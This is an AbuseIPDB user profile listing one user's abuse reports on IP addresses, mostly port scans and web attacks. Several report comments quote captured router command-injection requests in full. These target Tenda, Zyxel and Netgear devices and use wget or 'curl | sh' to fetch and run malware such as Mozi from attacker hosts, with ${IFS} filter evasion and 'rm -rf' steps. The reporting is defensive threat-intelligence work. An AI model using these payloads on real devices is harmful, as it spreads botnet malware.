Soren Kierkegaard - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

User Soren Kierkegaard joined AbuseIPDB in November 2023 and has reported 16 IP addresses.

Standing (weight) is good.

INACTIVE USER

IP	Date	Comment	Categories
🇬🇧 178.62.43.133	15 Jul 2024	NMAP aggressive scan	Port Scan
🇩🇪 46.101.144.130	15 Jul 2024	NMAP aggressive scan	Port Scan
🇩🇪 64.226.81.54	15 Jul 2024	NMAP aggressive scan	Port Scan
🇩🇪 64.227.121.131	15 Jul 2024	NMAP aggressive scan	Port Scan
🇺🇸 104.168.5.4	18 Jan 2024	Possible hosting malware /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tm ... show more Possible hosting malware /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp;%20rm%20-rf%20*;%20wget%20http://104.168.5.4/tenda.sh;%20chmod%20777%20tenda.sh;./tenda.sh show less	Exploited Host Web App Attack
🇻🇳 103.245.236.188	12 Jan 2024	Possible hosting malware /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS};${IFS}wget${IFS}htt ... show more Possible hosting malware /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS};${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep; show less	Exploited Host Web App Attack
🇻🇳 103.245.236.109	12 Jan 2024	/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS};${IFS}wget${IFS}http://103.245.236.109/skylj ... show more /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS};${IFS}wget${IFS}http://103.245.236.109/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;' show less	Web App Attack
🇺🇸 96.95.179.27	12 Jan 2024	/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS};${IFS}wget${IFS}http://103.245.236.109/skylj ... show more /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS};${IFS}wget${IFS}http://103.245.236.109/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;' show less	Web App Attack
🇦🇷 216.244.203.86	29 Nov 2023	Infected host GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;wget+http://216.244 ... show more Infected host GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;wget+http://216.244.203.86:55846/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 show less	Bad Web Bot
🇺🇬 102.216.147.231	24 Nov 2023	127.0.0.1:1024/shell?cd+/tmp;rm+-rf+*;wget+167.71.210.63/jaws;sh+/tmp/jaws	Brute-Force Bad Web Bot Web App Attack
🇸🇬 167.71.210.63	24 Nov 2023	:1024/shell?cd+/tmp;rm+-rf+*;wget+167.71.210.63/jaws;sh+/tmp/jaws	Brute-Force Exploited Host
🇺🇸 204.44.124.142	17 Nov 2023	email spam using this sender [email protected]	Email Spam
🇨🇭 35.216.227.54	15 Nov 2023	Unauthorized connection attempt TCP port 21, EHLO leakix.net GET / HTTP/1.1 HELP EHLO leakix.net ... show more Unauthorized connection attempt TCP port 21, EHLO leakix.net GET / HTTP/1.1 HELP EHLO leakix.net ? show less	FTP Brute-Force
🇺🇸 72.251.232.180	14 Nov 2023	Multiple scanning activity	Port Scan
🇦🇿 46.32.172.92	14 Nov 2023	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;wget+http://46.32.172.92:11897/Mo ... show more GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;wget+http://46.32.172.92:11897/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 show less	Exploited Host Web App Attack
🇵🇱 95.214.54.110	14 Nov 2023	uses bash to execute a command obtained from a remote server (curl 95.214.54.110/l \| sh)	Hacking Exploited Host